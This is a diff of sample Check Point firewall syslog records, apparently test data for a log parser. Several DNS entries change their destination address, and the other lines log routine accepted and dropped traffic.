-<134>1 2020-03-29T21:23:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111e0,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585517024"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47803"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T21:23:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111ea,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585517034"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52617"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:23:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111e0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57972"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:23:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111e0,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585517024"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47803"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:23:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111ea,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585517034"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52617"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T21:23:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8111ea,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52627"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T21:23:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111ea,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585517034"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52525"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:23:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111ea,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585517034"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52525"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T21:23:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8111ea,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45987"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T21:23:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8111ea,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51188"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10527"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T21:23:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8111ea,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51190"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10528"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T21:23:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8111ea,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51192"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10529"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T21:24:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111f4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585517044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39978"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T21:24:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111f4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585517044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34940"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:24:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111f4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585517044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39978"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:24:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111f4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585517044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34940"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T21:24:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8111f5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T21:24:07Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e8111f8,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2.21.41.118"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53524"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
 <134>1 2020-03-29T21:24:07Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e8111f8,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50810"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
 <134>1 2020-03-29T21:24:07Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e8111f8,0x2,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2.21.41.118"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53522"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
-<134>1 2020-03-29T21:24:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111fe,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585517054"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38206"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T21:24:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111fe,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585517054"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54229"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:24:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111fe,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585517054"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38206"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:24:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111fe,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585517054"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54229"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T21:24:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811223,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47870"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T21:24:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811224,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2.21.41.118"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"40806"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10530"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T21:24:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811224,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60576"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
@@ -5774,7 +5774,7 @@
 <134>1 2020-03-29T21:43:49Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e811697,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50812"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
 <134>1 2020-03-29T21:44:19Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116b3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"]
 <134>1 2020-03-29T21:44:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8116d9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"83.98.201.134"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49590"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
